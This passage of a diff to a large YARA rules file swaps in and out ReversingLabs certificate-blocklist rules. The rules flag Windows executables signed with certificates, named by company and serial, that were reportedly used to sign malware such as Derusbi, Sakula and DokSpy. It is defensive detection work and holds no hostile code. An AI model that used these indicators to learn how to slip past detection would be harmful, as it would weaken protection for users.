-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Paarcopy Oy" and ( pe.signatures [ i ] . serial == "00:c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" or pe.signatures [ i ] . serial == "c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" ) and 1608076800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRANIFLOR" and pe.signatures [ i ] . serial == "04:f3:80:f9:75:79:f1:70:2a:85:e0:16:9b:bd:fd:78" and 1454889599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9Faf8705A3Eaef9340800Cc4Fd38597C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_04D6B8Cc6Dce353Fcf3Ae8A532Be7255 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d2988928-4ef3-56bf-a407-f735756c7f81"
+		id = "937dd780-52f7-5f27-ac2e-a0245997d449"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7902-L7920"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1924-L1940"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "66a340f169e401705ba229d2d4548cef1a57bf1d2d320b108d12b2049b063b92"
+		logic_hash = "a316ad7f554428d02a850fb3bb04f349d30ecd2ccd4597e7a63461bf5e866e6f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17885,21 +40279,21 @@ rule REVERSINGLABS_Cert_Blocklist_9Faf8705A3Eaef9340800Cc4Fd38597C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tekhnokod LLC" and ( pe.signatures [ i ] . serial == "00:9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" or pe.signatures [ i ] . serial == "9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" ) and 1605744000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADERA" and pe.signatures [ i ] . serial == "04:d6:b8:cc:6d:ce:35:3f:cf:3a:e8:a5:32:be:72:55" and 1451692799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0940Fa9A4080F35052B2077333769C2F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_191322A00200F793 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "358391b7-649b-5792-b4bd-d97b388c5d12"
+		id = "4011e54c-ca28-536f-8759-077fcce6d45f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7922-L7938"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1942-L1958"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "45636ea33751fea61572539fe6f28bccd05df9b6b9e7f2d77bb738f7c69c53a2"
+		logic_hash = "1b816785f86189817c124636e50a0f369ec85cfd898223c4ba43758a877f1cf3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17909,21 +40303,21 @@ rule REVERSINGLABS_Cert_Blocklist_0940Fa9A4080F35052B2077333769C2F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROFF LAIN, OOO" and pe.signatures [ i ] . serial == "09:40:fa:9a:40:80:f3:50:52:b2:07:73:33:76:9c:2f" and 1603497600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRABHAKAR NARAYAN" and pe.signatures [ i ] . serial == "19:13:22:a0:02:00:f7:93" and 1442966399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ea720222D92Dc8D48E3B3C3B0Fc360A6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_451C9D0B413E6E8Df175 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8415406b-ede8-5404-8208-34eb649f7325"
+		id = "adc832c0-166d-52d1-aeec-2fc92ff52d02"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7940-L7958"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1960-L1976"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c60e1ccf178f03f930a3bc41e9a92be20df0362f067ed1fcfc7c93627a056d75"
+		logic_hash = "7c94d87f79c9add4d7bf2a63d0774449319aa56cbc631dd9b0f19ed9bb9837d4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17933,21 +40327,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ea720222D92Dc8D48E3B3C3B0Fc360A6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAVANAGH NETS LIMITED" and ( pe.signatures [ i ] . serial == "00:ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" or pe.signatures [ i ] . serial == "ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" ) and 1608640280 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRASAD UPENDRA" and pe.signatures [ i ] . serial == "45:1c:9d:0b:41:3e:6e:8d:f1:75" and 1442275199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4743E140C05B33F0449023946Bd05Acb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03943858218F35Adb7073A6027555621 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f783bad3-f350-5a74-8e3f-5b7220e4de8f"
+		id = "fbaf4c7a-5f20-57f7-b6b7-143fdbf0e5c2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7960-L7976"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1978-L1994"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "69ce1512d7df4926ee2b470b18fbe51a2aa81e07b37b2536617d6353045e0d19"
+		logic_hash = "93369d51b73591559494a48fafa5e4f7d46301ecaa379d8de70a70ac4d2d2728"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17957,21 +40351,21 @@ rule REVERSINGLABS_Cert_Blocklist_4743E140C05B33F0449023946Bd05Acb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STROI RENOV SARL" and pe.signatures [ i ] . serial == "47:43:e1:40:c0:5b:33:f0:44:90:23:94:6b:d0:5a:cb" and 1607644800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RuN APps FOrEver lld" and pe.signatures [ i ] . serial == "03:94:38:58:21:8f:35:ad:b7:07:3a:60:27:55:56:21" and 1480550399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A496Bc774575C31Abec861B68C36Dcb6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_09813Ee7318452C28A1F6426D1Cee12D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "51941c0d-a7a1-5c17-bef8-290e5db66fb7"
+		id = "db3c1992-b6a1-5aaf-ae3a-c626b531529a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7978-L7996"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1996-L2012"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f82214f982c9972e547f77966c44e935e9de701cc9108ceca34a4fede850d243"
+		logic_hash = "89eb019192f822f9fe070403161d81e425fb8acdbc80e55fa516b5607eb8f8c7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17981,21 +40375,21 @@ rule REVERSINGLABS_Cert_Blocklist_A496Bc774575C31Abec861B68C36Dcb6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGLE DVORSAK, d.o.o" and ( pe.signatures [ i ] . serial == "00:a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" or pe.signatures [ i ] . serial == "a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" ) and 1606867200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Saly Younes" and pe.signatures [ i ] . serial == "09:81:3e:e7:31:84:52:c2:8a:1f:64:26:d1:ce:e1:2d" and 1455667199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A55C15F733Bf1633E9Ffae8A6E3B37D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_476Bf24A4B1E9F4Bc2A61B152115E1Fe : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Derusbi malware."
 		author = "ReversingLabs"
-		id = "32cefe84-b305-5542-a5d3-1832dcbf6d61"
+		id = "a41e8196-f5ad-5046-82ac-38c6fe753bdb"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7998-L8014"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2014-L2030"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "89ca9f1c5cf0b029748528d8c5bb65f89ee05877bfdc13b4ce3d2d3e7feafb5d"
+		logic_hash = "0ec0f44d2a7a53ad5653334378b631abde1834ebfcf72efcdcce353c6b9ae17d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18005,21 +40399,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A55C15F733Bf1633E9Ffae8A6E3B37D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osnova OOO" and pe.signatures [ i ] . serial == "0a:55:c1:5f:73:3b:f1:63:3e:9f:fa:e8:a6:e3:b3:7d" and 1604016000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment co.,Ltd" and pe.signatures [ i ] . serial == "47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" and 1414454399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C650Ae531100A91389A7F030228B3095 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Bd55818C5971B63Dc45Cf57Cbeb950B : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Derusbi malware."
 		author = "ReversingLabs"
-		id = "5d506480-96ca-5e71-9fb2-185b2f8ddc6c"
+		id = "9269cc5c-039e-5d98-ac13-c7b99606e7fa"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8016-L8034"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2032-L2048"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "186b66283491cfebcaade57b1010ce4304c08ddb131153984210c2c7025961aa"
+		logic_hash = "5aa41a2d6a86a30559b36818602e1bdf2bfd38b799a4869c26c150052d6d788c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18029,21 +40423,21 @@ rule REVERSINGLABS_Cert_Blocklist_C650Ae531100A91389A7F030228B3095 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POKEROWA STRUNA SP Z O O" and ( pe.signatures [ i ] . serial == "00:c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" or pe.signatures [ i ] . serial == "c6:50:ae:53:11:00:a9:13:89:a7:f0:30:22:8b:30:95" ) and 1606089600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XL Games Co.,Ltd." and pe.signatures [ i ] . serial == "7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" and 1371513599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3990362C34015Ce4C23Ecc3377Fd3C06 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4C0B2E9D2Ef909D15270D4Dd7Fa5A4A5 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Derusbi malware."
 		author = "ReversingLabs"
-		id = "453b5da2-ae26-5005-8a56-1105a960fde6"
+		id = "97005464-1219-56d7-bd5c-f047558be1dc"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8036-L8052"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2050-L2066"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0625800fcb166b56cab2e16d0d757983a6f880b68627ed8c3c38419dd9a32999"
+		logic_hash = "9c74eb025bb413503b97ffdba6f19eadecf3789ce3a5d5419f84e32e25c9b5b1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18053,21 +40447,21 @@ rule REVERSINGLABS_Cert_Blocklist_3990362C34015Ce4C23Ecc3377Fd3C06 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RZOH ApS" and pe.signatures [ i ] . serial == "39:90:36:2c:34:01:5c:e4:c2:3e:cc:33:77:fd:3c:06" and 1606780800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fuqing Dawu Technology Co.,Ltd." and pe.signatures [ i ] . serial == "4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" and 1372118399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5E3D76Dc7E273E2F313Fc0775847A2A2 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Sakula and Derusbi malware."
 		author = "ReversingLabs"
-		id = "ebc47e1e-e6fe-581c-86b3-22e2e67a0b81"
+		id = "93707307-a250-526d-a3d4-32ed5d2a63a6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8054-L8070"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2068-L2084"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1edd5be3f970202be15080cd7ef19c0cce7fcba73cb6120d7cb7d518e877cf85"
+		logic_hash = "b943057fc3e97cfccadb4b8f61289a93b659aacf2a40217fcf519d4882e70708"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18077,21 +40471,21 @@ rule REVERSINGLABS_Cert_Blocklist_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kymijoen Projektipalvelut Oy" and pe.signatures [ i ] . serial == "12:1f:ca:3c:fa:4b:d0:11:66:9f:5c:c4:e0:53:aa:3f" and 1606953600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NexG" and pe.signatures [ i ] . serial == "5e:3d:76:dc:7e:27:3e:2f:31:3f:c0:77:58:47:a2:a2" and 1372723199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D338F8A490E37E6C2Be80A0E349929Fa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_47D5D5372Bcb1562B4C9F4C2Bdf13587 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Sakula malware."
 		author = "ReversingLabs"
-		id = "93ca450e-7278-5c6c-aba8-e90728570e0c"
+		id = "d888478e-3883-5d9d-a2b3-d59b57409b8d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8072-L8090"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2086-L2102"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "39d9695803e96508b5ad12a7d9f8b65d13288dbe94b21a4952e096dd576e11ce"
+		logic_hash = "fb4994647a2ed95c73625d90315c9b6deb6fb3b81b4aa6e847b0193f0a76650c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18101,21 +40495,21 @@ rule REVERSINGLABS_Cert_Blocklist_D338F8A490E37E6C2Be80A0E349929Fa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAGUARO ApS" and ( pe.signatures [ i ] . serial == "00:d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" or pe.signatures [ i ] . serial == "d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" ) and 1607558400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DTOPTOOLZ Co.,Ltd." and pe.signatures [ i ] . serial == "47:d5:d5:37:2b:cb:15:62:b4:c9:f4:c2:bd:f1:35:87" and 1400803199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2C1Ee9B583310B5E34A1Ee6945A34B26 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Ac10E68F1Ce519E84Ddcd28B11Fa542 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Sakula malware."
 		author = "ReversingLabs"
-		id = "70fc063e-f032-5e63-ae53-65a25d5a29c3"
+		id = "9cc0e518-84c8-5b23-b8cb-e0e0fe7849bd"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8092-L8108"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2104-L2120"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7752e49e8848863d78c5de03c3d194498765d80da00a84c5164c7a9010d13474"
+		logic_hash = "dac3b6b7609ec1e82afe4f9c6c14e2d32b6f5d8d49c59d6c605f2a94d71bc107"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18125,21 +40519,21 @@ rule REVERSINGLABS_Cert_Blocklist_2C1Ee9B583310B5E34A1Ee6945A34B26 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Artmarket" and pe.signatures [ i ] . serial == "2c:1e:e9:b5:83:31:0b:5e:34:a1:ee:69:45:a3:4b:26" and 1607558400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "U-Tech IT service" and pe.signatures [ i ] . serial == "3a:c1:0e:68:f1:ce:51:9e:84:dd:cd:28:b1:1f:a5:42" and 1420156799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D875B3E3F2Db6C3Eb426E24946066111 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_31062E483E0106B18C982F0053185C36 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Sakula malware."
 		author = "ReversingLabs"
-		id = "4aedeb77-181b-5422-bec4-93c84412bae4"
+		id = "84bce7c1-efba-5a76-8865-dcfcc8e50d41"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8110-L8128"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2122-L2138"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9e181271d46c828b9ec266331e077b3b4891a193c71173447da383fad91ae878"
+		logic_hash = "e45fc5b4d1b9f5cd35c56aad381e26e30675a9d99747cd318f3c77ea2af0e14a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18149,21 +40543,21 @@ rule REVERSINGLABS_Cert_Blocklist_D875B3E3F2Db6C3Eb426E24946066111 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kubit LLC" and ( pe.signatures [ i ] . serial == "00:d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" or pe.signatures [ i ] . serial == "d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" ) and 1606953600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MICRO DIGITAL INC." and pe.signatures [ i ] . serial == "31:06:2e:48:3e:01:06:b1:8c:98:2f:00:53:18:5c:36" and 1332287999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ad0A958Cdf188Bed43154A54Bf23Afba : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_20D0Ee42Fc901E6B3A8Fefe8C1E6087A : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Sakula malware."
 		author = "ReversingLabs"
-		id = "183d9d02-885b-5f2f-b455-dd72af7bc5a6"
+		id = "ba37919a-584b-5ff7-b4d5-5b711cc87b1f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8130-L8148"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2140-L2156"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "07e53e59f90aa3cd3a98dbca2627672606f6c6f8f3bda8456e32122463729c4b"
+		logic_hash = "2225302de1e8fe9f2ad064e19b2b1d9faf90c7cafbebff6ddd0921bf57c5f9e6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18173,21 +40567,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ad0A958Cdf188Bed43154A54Bf23Afba : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM Ltd" and ( pe.signatures [ i ] . serial == "00:ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" or pe.signatures [ i ] . serial == "ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" ) and 1612915200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SJ SYSTEM" and pe.signatures [ i ] . serial == "20:d0:ee:42:fc:90:1e:6b:3a:8f:ef:e8:c1:e6:08:7a" and 1391299199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3Cee26C125B8C188F316C3Fa78D9C2F1 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_127251B32B9A50Bd : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing OSX DokSpy backdoor."
 		author = "ReversingLabs"
-		id = "79989b9b-60e4-577d-97e2-cb447c38baf3"
